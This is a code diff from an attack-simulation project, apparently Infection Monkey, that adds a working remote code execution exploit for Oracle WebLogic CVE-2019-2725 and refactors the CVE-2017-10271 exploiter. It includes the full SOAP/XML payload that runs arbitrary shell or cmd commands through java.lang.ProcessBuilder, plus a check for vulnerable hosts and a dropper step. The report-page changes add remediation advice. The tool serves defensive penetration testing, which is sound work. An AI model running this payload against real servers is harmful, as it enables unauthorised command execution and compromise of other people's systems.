Merge pull request #357 from VakarisZ/wblogic_2019_2725

WebLogic CVE-2019-2725 implemented

monkey/infection_monkey/exploit/weblogic.py

@@ -1,3 +1,48 @@
+from __future__ import print_function
+import threading
+import logging
+import time
+import copy
+
+from requests import post, exceptions
+from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
+
+from infection_monkey.exploit.web_rce import WebRCE
+from infection_monkey.exploit import HostExploiter
+from infection_monkey.exploit.tools import get_free_tcp_port, get_interface_to_target
+
+
+__author__ = "VakarisZ"
+
+LOG = logging.getLogger(__name__)
+# How long server waits for get request in seconds
+SERVER_TIMEOUT = 4
+# How long should we wait after each request in seconds
+REQUEST_DELAY = 0.1
+# How long to wait for a sign(request from host) that server is vulnerable. In seconds
+REQUEST_TIMEOUT = 5
+# How long to wait for response in exploitation. In seconds
+EXECUTION_TIMEOUT = 15
+# Malicious requests' headers:
+HEADERS = {
+    "Content-Type": "text/xml;charset=UTF-8",
+    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) "
+                  "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
+}
+
+
+class WebLogicExploiter(HostExploiter):
+
+    _TARGET_OS_TYPE = ['linux', 'windows']
+    _EXPLOITED_SERVICE = 'Weblogic'
+
+    def exploit_host(self):
+        exploiters = [WebLogic20192725, WebLogic201710271]
+        for exploiter in exploiters:
+            if exploiter(self.host).exploit_host():
+                return True
+
+
 # Exploit based of:
 # Kevin Kirsche (d3c3pt10n)
 # https://github.com/kkirsche/CVE-2017-10271
@@ -5,28 +50,8 @@
 # Luffin from Github
 # https://github.com/Luffin/CVE-2017-10271
 # CVE: CVE-2017-10271
-from __future__ import print_function
+class WebLogic201710271(WebRCE):
-from requests import post, exceptions
+    URLS = ["/wls-wsat/CoordinatorPortType",
-from infection_monkey.exploit.web_rce import WebRCE
-from infection_monkey.exploit.tools import get_free_tcp_port, get_interface_to_target
-from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
-
-import threading
-import logging
-import time
-
-__author__ = "VakarisZ"
-
-LOG = logging.getLogger(__name__)
-# How long server waits for get request in seconds
-SERVER_TIMEOUT = 4
-# How long should be wait after each request in seconds
-REQUEST_DELAY = 0.0001
-# How long to wait for a sign(request from host) that server is vulnerable. In seconds
-REQUEST_TIMEOUT = 5
-# How long to wait for response in exploitation. In seconds
-EXECUTION_TIMEOUT = 15
-URLS = ["/wls-wsat/CoordinatorPortType",
             "/wls-wsat/CoordinatorPortType11",
             "/wls-wsat/ParticipantPortType",
             "/wls-wsat/ParticipantPortType11",
@@ -34,28 +59,20 @@ URLS = ["/wls-wsat/CoordinatorPortType",
             "/wls-wsat/RegistrationPortTypeRPC11",
             "/wls-wsat/RegistrationRequesterPortType",
             "/wls-wsat/RegistrationRequesterPortType11"]
-# Malicious request's headers:
-HEADERS = {
-            "Content-Type": "text/xml;charset=UTF-8",
-            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) "
-                          "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
-          }
 
-
+    _TARGET_OS_TYPE = WebLogicExploiter._TARGET_OS_TYPE
-class WebLogicExploiter(WebRCE):
+    _EXPLOITED_SERVICE = WebLogicExploiter._EXPLOITED_SERVICE
-    _TARGET_OS_TYPE = ['linux', 'windows']
-    _EXPLOITED_SERVICE = 'Weblogic'
 
     def __init__(self, host):
-        super(WebLogicExploiter, self).__init__(host, {'linux': '/tmp/monkey.sh',
+        super(WebLogic201710271, self).__init__(host, {'linux': '/tmp/monkey.sh',
                                                        'win32': 'monkey32.exe',
                                                        'win64': 'monkey64.exe'})
 
     def get_exploit_config(self):
-        exploit_config = super(WebLogicExploiter, self).get_exploit_config()
+        exploit_config = super(WebLogic201710271, self).get_exploit_config()
         exploit_config['blind_exploit'] = True
         exploit_config['stop_checking_urls'] = True
-        exploit_config['url_extensions'] = URLS
+        exploit_config['url_extensions'] = WebLogic201710271.URLS
         return exploit_config
 
     def exploit(self, url, command):
@@ -66,8 +83,8 @@ class WebLogicExploiter(WebRCE):
         try:
             post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False)
         except Exception as e:
-            print('[!] Connection Error')
+            LOG.error("Connection error: %s" % e)
-            print(e)
+            return False
 
         return True
 
@@ -196,6 +213,7 @@ class WebLogicExploiter(WebRCE):
         Http server built to wait for GET requests. Because oracle web logic vuln is blind,
         we determine if we can exploit by either getting a GET request from host or not.
         """
+
         def __init__(self, local_ip, local_port, lock, max_requests=1):
             self.local_ip = local_ip
             self.local_port = local_port
@@ -212,6 +230,7 @@ class WebLogicExploiter(WebRCE):
                 def do_GET():
                     LOG.info('Server received a request from vulnerable machine')
                     self.get_requests += 1
+
             LOG.info('Server waiting for exploited machine request...')
             httpd = HTTPServer((self.local_ip, self.local_port), S)
             httpd.daemon = True
@@ -224,3 +243,82 @@ class WebLogicExploiter(WebRCE):
 
         def stop(self):
             self._stopped = True
+
+
+# Exploit based of:
+# Andres Rodriguez (acamro)
+# https://github.com/rapid7/metasploit-framework/pull/11780
+class WebLogic20192725(WebRCE):
+    URLS = ["_async/AsyncResponseServiceHttps"]
+
+    _TARGET_OS_TYPE = WebLogicExploiter._TARGET_OS_TYPE
+    _EXPLOITED_SERVICE = WebLogicExploiter._EXPLOITED_SERVICE
+
+    def __init__(self, host):
+        super(WebLogic20192725, self).__init__(host)
+
+    def get_exploit_config(self):
+        exploit_config = super(WebLogic20192725, self).get_exploit_config()
+        exploit_config['url_extensions'] = WebLogic20192725.URLS
+        exploit_config['blind_exploit'] = True
+        exploit_config['dropper'] = True
+        return exploit_config
+
+    def exploit(self, url, command):
+        if 'linux' in self.host.os['type']:
+            payload = self.get_exploit_payload('/bin/sh', '-c', command)
+        else:
+            payload = self.get_exploit_payload('cmd', '/c', command)
+        try:
+            resp = post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT)
+            return resp
+        except Exception as e:
+            LOG.error("Connection error: %s" % e)
+            return False
+
+    def check_if_exploitable(self, url):
+        headers = copy.deepcopy(HEADERS).update({'SOAPAction': ''})
+        res = post(url, headers=headers, timeout=EXECUTION_TIMEOUT)
+        if res.status_code == 500 and "<faultcode>env:Client</faultcode>" in res.text:
+            return True
+        else:
+            return False
+
+    @staticmethod
+    def get_exploit_payload(cmd_base, cmd_opt, command):
+        """
+        Formats the payload used to exploit weblogic servers
+        :param cmd_base: What command prompt to use eg. cmd
+        :param cmd_opt: cmd_base commands parameters. eg. /c (to run command)
+        :param command: command itself
+        :return: Formatted payload
+        """
+        empty_payload = '''
+        <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" 
+        xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">
+            <soapenv:Header>
+                <wsa:Action>xx</wsa:Action>
+                <wsa:RelatesTo>xx</wsa:RelatesTo>
+                <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">
+                    <void class=\"java.lang.ProcessBuilder\">
+                        <array class=\"java.lang.String\" length=\"3\">
+                            <void index=\"0\">
+                                <string>{cmd_base}</string>
+                            </void>
+                            <void index=\"1\">
+                                <string>{cmd_opt}</string>
+                            </void>
+                            <void index=\"2\">
+                                <string>{cmd_payload}</string>
+                            </void>
+                        </array>
+                        <void method=\"start\"/>
+                    </void>
+                </work:WorkContext>
+            </soapenv:Header>
+            <soapenv:Body>
+                <asy:onAsyncDelivery/>
+            </soapenv:Body>
+        </soapenv:Envelope>'''
+        payload = empty_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt, cmd_payload=command)
+        return payload

monkey/monkey_island/cc/services/config_schema.py

@@ -89,7 +89,7 @@ SCHEMA = {
                     "enum": [
                         "WebLogicExploiter"
                     ],
-                    "title": "Oracle Web Logic Exploiter"
+                    "title": "WebLogic Exploiter"
                 },
                 {
                     "type": "string",

monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js

@@ -343,9 +343,7 @@ class ReportPageComponent extends AuthComponent {
                       href="https://cwiki.apache.org/confluence/display/WW/S2-045">
                       CVE-2017-5638</a>)</li> : null }
                   {this.state.report.overview.issues[this.Issue.WEBLOGIC] ?
-                    <li>Oracle WebLogic servers are vulnerable to remote code execution. (<a
+                    <li>Oracle WebLogic servers are susceptible to a remote code execution vulnerability.</li> : null }
-                      href="https://nvd.nist.gov/vuln/detail/CVE-2017-10271">
-                      CVE-2017-10271</a>)</li> : null }
                   {this.state.report.overview.issues[this.Issue.HADOOP] ?
                     <li>Hadoop/Yarn servers are vulnerable to remote code execution.</li> : null }
                   {this.state.report.overview.issues[this.Issue.PTH_CRIT_SERVICES_ACCESS] ?
@@ -889,16 +887,15 @@ class ReportPageComponent extends AuthComponent {
   generateWebLogicIssue(issue) {
     return (
       <li>
-        Install Oracle <a href="http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html">
+        Update Oracle WebLogic server to the latest supported version.
-        critical patch updates.</a> Or update to the latest version. Vulnerable versions are
-        10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.
         <CollapsibleWellComponent>
           Oracle WebLogic server at <span className="label label-primary">{issue.machine}</span> (<span
-          className="label label-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to <span
+          className="label label-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to one of <span
-          className="label label-danger">remote code execution</span> attack.
+          className="label label-danger">remote code execution</span> attacks.
           <br/>
-          The attack was made possible due to incorrect permission assignment in Oracle Fusion Middleware
+          The attack was made possible due to one of the following vulnerabilities:
-          (subcomponent: WLS Security).
+          <a href={"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10271"}> CVE-2017-10271</a> or
+          <a href={"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2725"}> CVE-2019-2725</a>
         </CollapsibleWellComponent>
       </li>
     );